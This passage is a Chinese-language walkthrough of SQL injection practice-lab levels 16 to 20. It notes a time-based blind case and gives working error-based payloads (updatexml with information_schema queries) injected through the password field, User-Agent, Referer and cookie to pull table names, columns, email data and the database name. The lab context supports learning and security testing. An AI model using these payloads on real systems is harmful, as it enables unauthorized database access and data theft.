第16关 时间盲注
随便提交几次,发现没有回显,考虑时间盲注
闭合符号
用户名随意,时间用了26s(用了or连接)
用户名正确,用了2s(用了and连接)
第17关 报错注入
从密码入手
判断闭合
在已知用户名admin下,进行注入
有回显,使用报错注入
爆表名
uname=admin&passwd=' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#&submit=Submit
爆字段
uname=admin&passwd=' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)#&submit=Submit
uname=admin&passwd=' and updatexml(1,concat(0x7e,(select group_concat(email_id) from emails),0x7e),1)#&submit=Submit
sql注入18 user-agent注入
这题注入的前提是账户名和密码要正确
使用报错注入
两个都可以用
' and updatexml(1,concat(0x7e,(database()),0x7e),1),1,1)#
' ,1, updatexml(1,concat(0x7e,(database()),0x7e),1),1,1)#
注意后面两个1,将ip和uname代替了
sql注入19-referer注入
和18关相差不大,只是注入位置在referer
sql注入20 cookie注入
uname=' union select 1,2,(updatexml(1,concat(0x7e,database(),0x7e),1))# ;
或者
uname=' and updatexml(1,concat(0x7e,database(),0x7e),1)# ;
